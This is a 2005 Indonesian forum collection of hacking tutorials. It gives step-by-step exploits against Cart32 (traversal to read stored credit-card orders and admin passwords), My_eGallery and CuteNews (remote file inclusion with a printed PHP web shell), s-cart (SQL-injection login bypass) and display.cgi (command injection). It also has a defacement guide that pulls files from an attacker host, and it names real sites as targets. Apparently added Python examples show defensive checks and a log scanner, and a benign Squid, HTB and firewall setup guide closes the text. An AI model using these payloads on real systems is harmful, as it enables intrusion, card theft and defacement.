HACKING TUTORIALS
#SOLOHACKERLINK COMMUNITY
Allnet + Dalnet
We present this collection of tutorials to those of you who want to learn hacking,
defacing, cracking, and anything related to the world of computers.
But remember: we are not responsible for any misuse of these articles.
Cart32 v3.5a
##############################################################################
TUTORIAL I : Cart32 v3.5a
by : PeNcOpEt_CiNtA
Posted : 11 October 2005
##############################################################################
Note: this can only be used on the handful of sites that share the same
weakness.
Step 1: First find a Cart32 v3.5a website.
Step 2: Search every search engine you know
with the keyword " Cart32 v3.5a "
Step 3: Go to the cart32.exe website
http://target/login/unicode/cart32.exe
(example: http://www.connectionsmall.com/scripts/cart32.exe/)
Step 4: Once you get there, you will be shown a page
like the one below:
========================================
Cart32 v3.5a
Shopping Cart System for Windows
http://www.cart32.com/
Registered to Greymane Connections License: Unlimited clients
©1996-2001 McMurtrey/Whitaker & Associates, Inc. Build 714
========================================
Step 4: Now what you have to do is append one of the following
extensions to the end of the URL; 98% of the time #1 and #2 are used
a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:)
b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:)
c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:)
ONLY USED OCCASIONALLY!
(example: http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:)
Step 5: Once you are in the root directory (c:), to get to the
cc's, append (progra~1\MWAInc\Cart32) to the end of that URL
so that you now see something like:
http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32
Now you can see many files such as:
2814659000-001001.c32
2814659000-001002.c32
2814659000-001003.c32
Step 6: Copy one of those file names and then append it
to the end of the URL, and it will look like:
http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\2814659000-001003.c32
Note: there you will also see other files that contain a great many
cc's, such as:
RONACK-orders.txt (this file is not on this particular site)
procure-orders.txt (this file is not on this particular site)
Step 7: Before you access other file types, you first have to change
*c+dir+c:* to *c+type+c:*
========================================
TUTORIAL II : Cart32 v3.5a
----------------------------------------
Target: http://www.partybows.com
1. Go to http://www.partybows.com
2. Click http://www.partybows.com/seasonal.htm
3. Fill in Quantity = 1, basically as if you were pretending to buy, and click order
4. You will then end up here:
https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem
5. Change it to
https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error
Cart32 v3.5 Error
CART32 Build 619
The following internal error has occurred: Invalid procedure
Error Number = 5
Click Here For Possible Solutions
etc.
6. Look for the order log
Cart32 Setup Info and Directory
Mail Server = mail.axion.net Section=Main
AdminDir = D:securewebrootpartybowscgi-bincart32
So it is partybows-orders.txt.
Which finally gives:
http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt
7. Or, to get the admin password, you just type cart32.ini
https://secure.axionet.com/partybows/cgi-bin/cart32.ini
and, without meaning to, you will download the admin password
that is in the cart32.ini file.
You will get the admin password in encrypted form;
then try to decrypt it with the software
" Cart32decoder.exe "
8. To get the client names and passwords in Cart32
you can try typing "CLIENT.DBF"
or:
the order file in "ORDER" or "ORDERS.DBF"
========================================
TUTORIAL III : Cart32 v3.5a
----------------------------------------
search +/scripts/cart32.exe/
Exploitable Directories
-/scripts/cart32.ini
-/scripts/cart32.exe
-/scripts/cart32.exe/cart32clientlist
-/script/c32web.exe/ChangeAdminPassword
-/scripts/c32web.exe
-cgi-shl/c32web.exe/
Wherever there is cart32.exe, add /cart32clientlist to the end of it
and erase the rest. A menu will come up with a submit box; click Go.
It will list ALL clients and their passwords; the passwords will be encrypted.
After decrypting the password, go to wherever the [c32web.exe] file is.
Those are the instructions with the exploits from that channel we were just in.
-------------------------------------------------------------------------------------------------
Post by : PeNcOpEt_CiNtA on [ 11 November 2005 08:56:21 ]
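The three extensions in Tutorial I all exploit the same decoding flaw: an overlong UTF-8 encoding of `/` (`%c0%af`, `%e0%80%af`) or of `\` (`%c1%9c`) that a strict decoder rejects, but that a lenient decoder accepts only after the server has already checked the raw path for `..`. The Python below is an added example, not code from the original post: a lenient decoder that reproduces the mistake so the canonicalisation gap is visible, beside the strict decode and root-escape check a defender applies instead; the request paths are constructed from the shapes in the tutorial.

```python
from urllib.parse import unquote_to_bytes


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 the way the vulnerable decoders of that era did: the lead
    byte is trusted for the number of continuation bytes and the code point is
    computed arithmetically, so overlong forms such as C0 AF (for '/') or
    C1 9C (for '\\') are accepted instead of rejected. Shown only to make the
    canonicalisation gap visible; never use this in a server."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1; continue
        if 0xC0 <= b < 0xE0:
            need, cp = 1, b & 0x1F
        elif 0xE0 <= b < 0xF0:
            need, cp = 2, b & 0x0F
        elif 0xF0 <= b < 0xF8:
            need, cp = 3, b & 0x07
        else:
            out.append('\ufffd'); i += 1; continue
        tail = data[i + 1:i + 1 + need]
        if len(tail) < need or any(t & 0xC0 != 0x80 for t in tail):
            out.append('\ufffd'); i += 1; continue
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        out.append(chr(cp) if cp <= 0x10FFFF else '\ufffd')
        i += 1 + need
    return ''.join(out)


def strict_utf8_decode(data: bytes):
    """The check a defender wants: Python's decoder rejects overlong forms."""
    try:
        return data.decode('utf-8')
    except UnicodeDecodeError:
        return None


def canonical_path(raw_path: str, decoder=lenient_utf8_decode) -> str:
    """Percent-decode, UTF-8-decode, unify separators and resolve '..' so the
    result is the path the file system would actually open. Leading '..'
    segments that survive mean the request escaped the web root."""
    text = decoder(unquote_to_bytes(raw_path))
    parts = []
    for seg in text.replace('\\', '/').split('/'):
        if seg == '..':
            if parts and parts[-1] != '..':
                parts.pop()
            else:
                parts.append('..')
        elif seg not in ('', '.'):
            parts.append(seg)
    return '/'.join(parts)


def classify(raw_path: str):
    """Verdict for one request path, plus what a lenient server would have
    opened (useful when triaging old logs):
      'reject-encoding' - strict UTF-8 decoding fails (overlong or invalid)
      'traversal'       - decodes cleanly but escapes the web root
      'ok'              - neither"""
    lenient_view = canonical_path(raw_path)
    if strict_utf8_decode(unquote_to_bytes(raw_path)) is None:
        return 'reject-encoding', lenient_view
    if lenient_view.startswith('..'):
        return 'traversal', lenient_view
    return 'ok', lenient_view


# Constructed request paths: the three encodings from Tutorial I, a plain
# percent-encoded traversal, and a benign request.
SAMPLE_PATHS = [
    "/scripts/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe",
    "/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe",
    "/scripts/..%c1%9c../winnt/system32/cmd.exe",
    "/scripts/..%2f..%2fwinnt/system32/cmd.exe",
    "/scripts/cart32.exe",
]


def scan(paths=SAMPLE_PATHS):
    """Map each sample path to its (verdict, lenient canonical path)."""
    return {p: classify(p) for p in paths}


if __name__ == '__main__':
    for path, (verdict, seen) in scan().items():
        print(f'{verdict:16} {path}\n{"":16} -> {seen}')
```

Rejecting on the strict decode before any path logic runs is the fix; the lenient view is only there to show what the vulnerable server would have opened.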
My_eGallery security exploit
##############################################
My_eGallery security exploit
Author : PeNcOpEt_CiNtA ( seng_due@yahoo.co.id )
##############################################
Buggy file, probably: displayCategory.php
Display : http://www.target.com/modules/My_eGallery/public/displayCategory.php
Note :
to attack you must use this script; save it and upload it to your website,
e.g. save it with the file name: cmd.txt
e.g. from my site: http://www.geocities.com/seng_due/script/solohackerlink.txt
---------------- script from here -----------------------------------------------------
<font size="1">TEST SYSTEM KEAMANAN SERVER ANDA!!!</font>
<img src="http://www.geocities.com/aritrokok/aritrokok.jpg">
<?php
# saleho PHP :
# Released by : Solohackerlink-Crew
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
// $chdir and $cmd come straight from the request (relies on register_globals)
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
// HTML-escape the captured output so it is shown literally in the browser
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
#SOLOHACKERLINK
------------------ End of Script ---------------------------------------------------------
###################################
Ok, and now let's search for your target
###################################
1. search on every search engine, e.g. --> "allinurl:displayCategory.php" or "My_eGallery"
2. Get a target site like -->
http://www.target.com/modules/My_eGallery/public/displayCategory.php
3. test the attack with the code:
?basepath=http://if-istp.net/cmd.txt?&cmd=uname -a;id;
4. The attack looks like:
http://www.target.com/modules/My_eGallery/public/displayCategory.php?basepath=http://if-istp.net/cmd.txt?&cmd=uname -a;id;
5. Linux and Unix commands used here :P~ e.g.: ls -al, uname -r, cat, echo, etc....
6. So, what are you waiting for!!!
Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:53:10 ]
s-cart vulnerability
##############################################
S-Cart injection bugs
Author : PeNcOpEt_CiNtA
##############################################
Buggy file: admin page --> /admin
Display : http://target.com/s-cart/admin
1. search on every search engine, e.g. --> allinurl:s-cart/index.phtml or "s-cart"
2. Get a target site like --> http://www.target.com/s-cart/index.phtml
3. and now go to the admin page by changing the URL to:
http://www.target.com/s-cart/admin --> the browser automatically prompts for a login and password!!!
login : admin
passwd : 'or''='
4. If you are lucky, you can see the admin manager, show the Order table, or deface the s-cart page.
Ok, let's try :P~
Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:49:25 ]
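The password `' or ''='` in step 3 only works when the login handler builds its SQL by string concatenation: the injected quote closes the literal and `or ''=''` makes the WHERE clause true for every row. The Python/sqlite3 below is an added example, not code from the original post or from s-cart (table and column names are constructed): the vulnerable query beside a parameterised one, run against the same input.

```python
import sqlite3

BYPASS = "' or ''='"   # the password value given in step 3 above


def make_db():
    """Constructed sample table: one admin row; the stored value is a placeholder."""
    conn = sqlite3.connect(':memory:')
    conn.execute("CREATE TABLE admins (login TEXT, passwd TEXT)")
    conn.execute("INSERT INTO admins VALUES ('admin', 'placeholder-secret')")
    conn.commit()
    return conn


def render_concat(login, passwd):
    """The query text a string-building login handler actually sends."""
    return ("SELECT COUNT(*) FROM admins WHERE login='%s' AND passwd='%s'"
            % (login, passwd))


def login_concat(conn, login, passwd):
    """Vulnerable form: the quote in the input closes the literal and the
    rest (or ''='') becomes SQL, so the WHERE clause is true for every row."""
    return conn.execute(render_concat(login, passwd)).fetchone()[0] > 0


def login_param(conn, login, passwd):
    """Hardened form: bound parameters; the same input is compared as a
    plain string against the stored value and is never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM admins WHERE login=? AND passwd=?"
    return conn.execute(sql, (login, passwd)).fetchone()[0] > 0


def demo():
    """Run the bypass value through both forms and return the outcomes."""
    conn = make_db()
    return {
        'rendered': render_concat('admin', BYPASS),
        'concat_bypass': login_concat(conn, 'admin', BYPASS),
        'param_bypass': login_param(conn, 'admin', BYPASS),
        'param_real': login_param(conn, 'admin', 'placeholder-secret'),
    }


if __name__ == '__main__':
    for key, value in demo().items():
        print(f'{key}: {value}')
```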
display.cgi vulnerability
##############################################
Abrior's Encore WebForum ( display.cgi )
Author : PeNcOpEt_CiNtA ( seng_due@yahoo.co.id )
Forum : #Cracked On aLL.NeT
##############################################
Buggy file: /forumcgi/display.cgi?
Display : http://www.target.com/encore/forumcgi/display.cgi?
1. search on every search engine, e.g. --> allinurl:forumcgi/display.cgi?
2. Get a target site like --> http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp
3. and now go to the exploit by inserting this code:
&page=anonymous&file=|uname%20-a|
4. The full URL looks like:
http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname%20-a|
5. Linux or Unix commands are available here... Good luck :P~
Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:48:30 ]
cutenews vulnerability
********************************************
PeNcOpEt_CiNtA From Solohackerlink
********************************************
this time the bug hits CuteNews for PHP, where the bug is in shownews.php;
the cutepath variable is what gets executed. you can use news.txt or config.php to
find out the commands from PHP
ok.. let's continue...
the hacking concept is as follows:
http://target.com/cutenews/shownews.php?cutepath=http://inject.com
now how do we get hold of such a target???
hehehehe curious, eh... ok.. let's open up uncle google and give it the following
keywords:
inurl:cutenews/shownews.php
see.... lots of them, right....
for example:
www.flip-script.com/cutenews/shownews.php
then you change it like this
http://www.flip-script.com/cutenews/shownews.php?cutepath=http://geocities.com/seng_due/script/solohackerlink.txt?&cmd=id
hehehe and see what happens....
after that you can experiment on your own OK....
Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:43:10 ]
Dropping a file
DROPPING FILES ON SITES THAT HAVE A SECURITY HOLE
(other people might call it defacing)
Hehehe, odd title, isn't it.... Other people would probably rather call it
defacing. There is actually a small difference between defacing and dropping a file: defacing
means changing the look of a site, whether its main page or not (it is somewhat
destructive), whereas dropping a file only places a separate file on a site without
changing any particular page of the site that was broken into.
OK... I think that's enough small talk. Let's go straight to the main discussion.
Quite a few steps are needed to be able to drop a file on a site that
has a security hole.
1. Learn the basic commands of the operating system, both Windows and the *nix family (Linux, BSD,
MacOS, SunOS, Unix, etc.)
2. Find and study the bugs in the web applications out there.
3. Learn how to use search engines (especially Google).
4. Prepare some files that may be used later, and store them on some site (if
you can't afford to buy one, well.... just make a free site)
5. Learn how to find the list of sites on a server (usually one server can hold many
sites, sometimes even hundreds)
1. Basic operating system commands
Below I will explain some basic commands of the operating system, both Windows
and *nix, that may come in handy when infiltrating a system later on.
To try running these basic commands, on Windows use the DOS
prompt, while on *nix use sh, bash, bsh and so on (the command line interface).
What if you are a Windows user and still want to try *nix commands? Look for
sites that provide free shells, which you can use through telnet or PuTTY.
DOS     *NIX    Description
dir     ls      List the files in a directory
ren     mv      Rename a file
copy    cp      Copy a file
del     rm      Delete a file or directory
mkdir   mkdir   Create a new directory
type    cat     Show the contents of a file
cd      cd      Change directory
        pwd     Show the current directory
2. Web application bugs
There are several kinds of bugs, among them remote command execution, file injection and SQL
injection.
Examples:
phpBB2 remote command execution:
http://korban.com/viewtopic.php?t=1&highlight=%2527.passthru($HTTP_GET_VARS[cmd]).%2527&cmd=id;pwd;ls -al
CGI remote command execution
http://korban.com/index.cgi?page=view.txt|id;pwd|
PHP file injection
http://korban.com/index.php?file=http://situsmu.com/file_inject.txt?cmd=id;pwd
ASP/MSSQL SQL injection
http://korban.com/index.asp?id=1;update table set field5='hacked' where field1=1
To find more web application bugs, visit the security sites
or hacker sites out there.
3. Using search engines (Google)
Google is the search engine very often used by hackers to find sites
that have security holes. There are several options that can be added to the keyword
to narrow the search.
allinurl:file_manager.php --> finds only sites that have the file file_manager.php
intitle:hacked --> finds sites whose title contains the word hacked
There are several more options that can be used. These options can be combined
so that the scope of the search results is narrower still.
Read about them directly at google.com or on hacker sites for further
details.
4. Files that may be needed
Below are the files that may be needed to carry out an intrusion.
Phpshell
Phpshell can be used to exploit a file injection bug, or stored on a site that has already
been broken into, to run shell commands on a system that uses PHP
as its web programming language.
Cgitelnet
CGI telnet can only be run once it has been planted on a site; its function is the same as
phpshell, namely running shell commands. For sites that use Perl.
cmdAsp
the same function as phpshell and CGI telnet, for sites that use ASP.
5. Finding the names and directories of other sites on the same server
There are several methods that can be used (*nix), assuming the id we obtained
is apache, nobody, httpd, or www. If the id we obtained is a user name then
congratulations... we can deface the main page.
a. httpd.conf
Look for the httpd.conf file by running the command locate httpd.conf.
Suppose the result is /etc/httpd/httpd.conf; view its contents with the command cat /etc/httpd/httpd.conf
If we are lucky, that file contains the list of site names along with their root directories.
If not, use another method.
b. /etc/passwd
We can use the /etc/passwd file to feel our way to the site directories.
To do so, run the command pwd; suppose the result is /home/telo/public_html
Next view the contents of /etc/passwd with the command cat /etc/passwd
Look at the contents and note every user entry that contains the word /home
For example /home/user1, /home/user2
From this we only get the root directory of a site, but we do not yet know the name of
the site.
So how do we find out? The manual way, by browsing the contents of the files
in that site's directory, e.g. cd /home/user1/public_html;cat index.html; this method
needs a little patience :)
c. /home
suppose the result of pwd is /home/telo/public_html.
Run the command ls /home to see the contents of the /home directory
If there is any output we are quite lucky, because most servers do not allow
nobody to see the contents of that directory.
The rest is much the same as part b above; this method is also similar if we get a pwd result
like /etc/www/vhost/teloganyong.com/httpdocs.
OK, that's enough introduction for now; let's try a case that is close to
real.
For illustration, I prefer getting a PHP file injection bug, so this bug
serves as the example :)
http://korban.com/index.php?file=http://situsmu.com/inject.txt? (don't forget the question mark)
(I assume inject.txt consists of one textbox and one submit button)
1. Enter the command id;pwd;ls -al
2. look at the result; from here on we assume the result is id=nobody,
pwd=/home/korban/public_html, and the result of ls -al need not be listed.
3. Find a place where we are allowed to write, by running the command
find /home/korban/public_html -perm 777 -type d
4. If the command in step 3 produces a list of directories, we can write
5. Suppose the result is /home/korban/public_html/images
6. Put in the file you want to plant by running the command
cd /home/korban/public_html/images;wget http://situsmu.com/deface.html;ls (for example); the
ls command is used to check whether the file was dropped successfully
7. If it worked, we can access the file at http://korban.com/images/deface.html
8. done
note: for the command that fetches the file, wget may not exist or may need extra
options; try the following alternatives
wget http://situsmu.com/deface.html
wget -O deface.html http://situsmu.com/deface.html
curl -o deface.html http://situsmu.com/deface.html
lwp-download http://situsmu.com/deface.html
fetch http://situsmu.com/deface.html
lynx -source http://situsmu.com/deface.html > deface.html
if that still does not work, use the echo command to write the file
directly
cd /home/korban/public_html/images;echo tested by telo > telo.html;ls
http://korban.com/images/telo.html
Post by : x`shell on [ 10 November 2005 17:43:02 ]
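The My_eGallery, CuteNews and display.cgi posts above, the bug list in section 2 of this post and the file-dropping procedure at its end all leave the same traces in a web server's access log: a query parameter whose value is a URL ending in `?` (remote file inclusion), a value wrapped in `|` (Perl open() pipe injection), a `cmd` parameter carrying a shell command line, or PHP function calls smuggled into a value. The Python below is an added example, not code from any of the posts: it parses constructed Apache combined-format lines shaped like those requests and reports the findings per request; hosts, addresses and paths are made up.

```python
import re
from urllib.parse import unquote

# Constructed log lines shaped like the requests in the posts above. Hosts,
# addresses and paths are made up for the example.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Nov/2005:06:53:10 +0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/cmd.txt?&cmd=uname%20-a;id; HTTP/1.0" 200 512
10.0.0.5 - - [11/Nov/2005:06:43:10 +0700] "GET /cutenews/shownews.php?cutepath=http://attacker.example/s.txt?&cmd=cd%20/home/v/public_html/images;wget%20http://attacker.example/deface.html HTTP/1.0" 200 301
10.0.0.7 - - [11/Nov/2005:06:48:30 +0700] "GET /encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname%20-a| HTTP/1.0" 200 88
10.0.0.9 - - [11/Nov/2005:06:50:00 +0700] "GET /viewtopic.php?t=1&highlight=%2527.passthru($HTTP_GET_VARS[cmd]).%2527&cmd=id;pwd HTTP/1.0" 200 700
192.168.1.2 - - [11/Nov/2005:07:00:00 +0700] "GET /cutenews/shownews.php?subaction=showfull&id=1130000000 HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$')

SHELL_META = re.compile(r'[;|`]|\$\(')
SHELL_TOOLS = re.compile(r'\b(id|uname|wget|curl|cat|ls|pwd|echo|lwp-download|fetch|lynx)\b')
PHP_EXEC = re.compile(r'\b(passthru|system|exec|shell_exec|popen)\s*\(')


def split_query(target):
    """Split 'path?a=b&c=d' into (path, [(name, decoded value), ...]).
    Done by hand rather than with parse_qsl so that ';' inside a value
    survives (older parse_qsl versions treat it as a pair separator)."""
    path, _, query = target.partition('?')
    pairs = []
    for chunk in query.split('&'):
        if chunk:
            name, _, value = chunk.partition('=')
            pairs.append((unquote(name), unquote(value)))
    return path, pairs


def analyse_request(target):
    """Return a list of findings ('kind:param') for one request target."""
    findings = []
    _, pairs = split_query(target)
    for name, val in pairs:
        low = val.lower()
        # remote file inclusion: the value is itself a URL; the trailing '?'
        # turns whatever the script appends into a query string of that URL
        if low.startswith(('http://', 'https://', 'ftp://')):
            findings.append(f'rfi:{name}')
        # Perl open() pipe injection: value wrapped in '|'
        if len(val) > 1 and val.startswith('|') and val.endswith('|'):
            findings.append(f'pipe-cmd:{name}')
        # a shell command line: the conventional 'cmd' parameter of injected
        # shells, or shell metacharacters together with a known tool name
        if name == 'cmd' or (SHELL_META.search(val) and SHELL_TOOLS.search(val)):
            findings.append(f'shell-cmd:{name}')
        # PHP code in a value (double-encoded quotes are decoded once here)
        if PHP_EXEC.search(low):
            findings.append(f'php-exec:{name}')
    return findings


def scan_log(text=SAMPLE_LOG):
    """Parse each log line and keep those with at least one finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        findings = analyse_request(m['target'])
        if findings:
            hits.append({'ip': m['ip'], 'ts': m['ts'],
                         'path': m['target'].split('?')[0], 'findings': findings})
    return hits


if __name__ == '__main__':
    for h in scan_log():
        print(h['ts'], h['ip'], h['path'], ', '.join(h['findings']))
```

A value that is a URL is the decisive signal for the file-inclusion class; the `cmd` and pipe checks catch the follow-on command execution even when the inclusion came through a parameter name this list does not know.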
Installing Squid + Compiling the Kernel + HTB + IPTABLES
==================================================
This configuration is intended for Madya (c3p0t) and Dana (suheng) of Warnet Citra Pangkalpinang and
Warnet Speednet Pangkalpinang.
Download the Squid source:
wget -c http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE7.tar.bz2
Extract the Squid source:
tar -jxf squid-2.5.STABLE7.tar.bz2
Configure Squid:
cd squid-2.5.STABLE7
make sure the glibc package is installed on the system:
installpkg /mnt/cdrom/slackware/l/glibc*.tgz
./configure --prefix=/usr/local/squid \
--exec-prefix=/usr/local/squid \
--enable-delay-pools --enable-cache-digests \
--disable-ident-lookups --enable-async-io=16 \
--enable-removal-policies="lru,heap" \
--enable-poll --enable-linux-netfilter
Install Squid:
make
make install
Standard squid.conf:
##########################
http_port 3128
icp_port 3130
hierarchy_stoplist cgi-bin ?
acl QUERY urlpath_regex cgi-bin ?
no_cache deny QUERY
cache_mem 8 MB
cache_swap_low 90
cache_swap_high 95
cache_replacement_policy lru
cache_dir ufs /usr/local/squid/var/cache 1000 16 256
cache_access_log /usr/local/squid/var/logs/access.log
cache_log /usr/local/squid/var/logs/cache.log
cache_store_log none
mime_table /usr/local/squid/etc/mime.conf
pid_filename /usr/local/squid/var/logs/squid.pid
debug_options ALL,1
ftp_user Squid@
ftp_list_width 32
ftp_passive on
dns_nameservers 127.0.0.1
refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern . 0 20% 4320
acl all src 0.0.0.0/0.0.0.0
acl manager proto cache_object
acl localhost src 127.0.0.1/255.255.255.255
acl to_localhost dst 127.0.0.0/8
acl SSL_ports port 443 563 8443
acl Safe_ports port 80 # http
acl Safe_ports port 21 # ftp
acl Safe_ports port 443 563 # https, snews
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl CONNECT method CONNECT
http_access allow manager localhost
http_access deny manager
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
acl our_networks src 192.168.1.0/24
http_access allow our_networks
acl IIX dst_as 7713 4795 7597 4622 4787 4800
always_direct allow IIX
http_access deny all
cache_mgr webmaster
cache_effective_user squid
cache_effective_group squid
visible_hostname warnet.citra.com
httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy on
httpd_accel_uses_host_header on
################################
other configuration options can be read in squid.conf.default
Running squid for the first time:
groupadd -g 8080 squid
useradd -g 8080 -u 8080 -s /bin/false -d /usr/local/squid squid
check the config for errors:
/usr/local/squid/sbin/squid -k parse
create the cache directories:
/usr/local/squid/sbin/squid -z
Start squid:
/usr/local/squid/sbin/squid -DY
(also add it to rc.local)
Compile Kernel :
================
The kernel is recompiled so it can be optimised later on; here we add the
QoS option for the bandwidth limiter facility. Make sure the ncurses package is installed
installpkg /mnt/cdrom/slackware/l/ncurse*.tgz
cd /usr/src/linux
make menuconfig
Networking options --->
  QoS and/or fair queueing --->
    [*] QoS and/or fair queueing
    [*] QoS support
    [*] Rate estimator
    [*] Packet classifier API
    [*] Traffic policing (needed for in/egress)
exit and save the configuration above
make dep
make clean
make modules
make modules_install
make bzImage
Bootloader configuration
cp System.map /boot/System.map-qos
cp arch/i386/boot/bzImage /boot/vmlinuz-qos
pico /etc/lilo.conf
###########################
# Start LILO global section
boot = /dev/hda
message = /boot/boot_message.txt
prompt
timeout = 1200
# Override dangerous defaults that rewrite the partition table:
change-rules
reset
# Normal VGA console
vga = normal
# Linux bootable partition config begins
image = /boot/vmlinuz-qos
root = /dev/hda2
label = Linux-QOS
read-only
# Linux bootable partition config ends
# Linux bootable partition config begins
image = /boot/vmlinuz
root = /dev/hda2
label = Linux
read-only
# Linux bootable partition config ends
##############################
reboot
HTB Bandwidth Management
=======================
In this experiment there are 3 computers.
Total Internet bandwidth: 64 Kbps downlink, upstream not limited
computer 1, named madya, IP 192.168.1.2, will get a 32 Kbps downlink share
computer 2, named dana, IP 192.168.1.3, will get a 16 Kbps downlink share
computer 3, named dion, IP 192.168.1.4, will get a 16 Kbps downlink share
download HTB.INIT
wget http://aleron.dl.sourceforge.net/sourceforge/htbinit/htb.init-v0.8.5
cp htb.init-v0.8.5 /usr/sbin/htb.init
chmod 755 /usr/sbin/htb.init
create the htb directory
mkdir -p /etc/sysconfig/htb
pico /etc/sysconfig/htb/eth0
R2Q=1
pico /etc/sysconfig/htb/eth0-10.root
RATE=64Kbit
QUANTUM=1500
pico /etc/sysconfig/htb/eth0-10:1.madya
RATE=32Kbit
QUANTUM=1500
CEIL=64Kbit
LEAF=sfq
RULE=192.168.1.2/32,
pico /etc/sysconfig/htb/eth0-10:2.dana
RATE=16Kbit
QUANTUM=1500
CEIL=64Kbit
LEAF=sfq
RULE=192.168.1.3/32,
pico /etc/sysconfig/htb/eth0-10:3.dion
RATE=16Kbit
QUANTUM=1500
CEIL=64Kbit
LEAF=sfq
RULE=192.168.1.4/32,
Install iproute2 from src.teras.net.id
wget http://src.teras.net.id/slack-pkg/iproute2-2.4.7_now_ss020116_try-i386-4.tgz
installpkg iproute2-2.4.7_now_ss020116_try-i386-4.tgz
download the tc patch from docum.org
wget http://www.docum.org/docum.org/download/tc.bz2
extract tc and copy it to /sbin/
bunzip2 tc.bz2
cp tc /sbin/
chmod 755 /sbin/tc
Compile htb.init
htb.init compile
Start htb.init
htb.init start
If there are no errors, you have finished installing the htb bandwidth limiter; don't forget to put htb.init start
in rc.local
IPTABLES
========
#!/bin/sh
##############################################################################
# usage: firewall (start|stop|restart|status) EXTIF INTIF
# example: "firewall start ppp0 eth0"
##############################################################################
IPTABLES="/usr/sbin/iptables"
case "$1" in
stop)
echo "firewall dimatikan..!!!"
$IPTABLES -F
$IPTABLES -F -t mangle
$IPTABLES -F -t nat
$IPTABLES -X
$IPTABLES -X -t mangle
$IPTABLES -X -t nat
$IPTABLES -P INPUT ACCEPT
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P FORWARD ACCEPT
echo "...done"
;;
status)
echo $"Table: filter"
iptables --list
echo $"Table: nat"
iptables -t nat --list
echo $"Table: mangle"
iptables -t mangle --list
;;
restart|reload)
$0 stop
$0 start
;;
start)
echo "Benteng Firewall diaktifkan"
echo ""
DEFAULT_EXTIF="ppp0"
DEFAULT_INTIF="eth0"
UNIVERSE="0.0.0.0/0"
UNPRIVPORTS="1024:65535"
XWINPORTS="6000:6063"
IRCPORTS="6665,6666,6667,6668,6669,7000"
#-----Port-Forwarding Variables-----#
#For port-forwarding to an internal host, define a variable with the appropriate
#internal IP-Address here and take a look at the port-forwarding sections in the FORWARD +
#PREROUTING-chain:
#These are examples, uncomment to activate
#IP for forwarded Battlecom-traffic
#BATTLECOMIP="192.168.0.5"
#IP for forwarded HTTP-traffic
#HTTPIP="192.168.0.20"
#----Flood Variables-----#
# Overall Limit for TCP-SYN-Flood detection
TCPSYNLIMIT="5/s"
# Burst Limit for TCP-SYN-Flood detection
TCPSYNLIMITBURST="10"
# Overall Limit for Loggging in Logging-Chains
LOGLIMIT="2/s"
# Burst Limit for Logging in Logging-Chains
LOGLIMITBURST="10"
# Overall Limit for Ping-Flood-Detection
PINGLIMIT="5/s"
# Burst Limit for Ping-Flood-Detection
PINGLIMITBURST="10"
#----Automatically determine infos about involved interfaces-----#
### External Interface:
## Get external interface from command-line
## If no interface is specified then set $DEFAULT_EXTIF as EXTIF
if [ "x$2" != "x" ]; then
EXTIF=$2
else
EXTIF=$DEFAULT_EXTIF
fi
echo External Interface: $EXTIF
## Determine external IP
EXTIP="`ifconfig $EXTIF | grep inet | cut -d : -f 2 | cut -d ' ' -f 1`"
if [ "$EXTIP" = '' ]; then
echo "Aborting: Unable to determine the IP-address of $EXTIF !"
exit 1
fi
echo External IP: $EXTIP
## Determine external gateway
EXTGW=`route -n | grep -A 4 UG | awk '{ print $2}'`
echo Default GW: $EXTGW
echo " --- "
### Internal Interface:
## Get internal interface from command-line
## If no interface is specified then set $DEFAULT_INTIF as INTIF
if [ "x$3" != "x" ]; then
INTIF=$3
else
INTIF=$DEFAULT_INTIF
fi
echo Internal Interface: $INTIF
## Determine internal IP
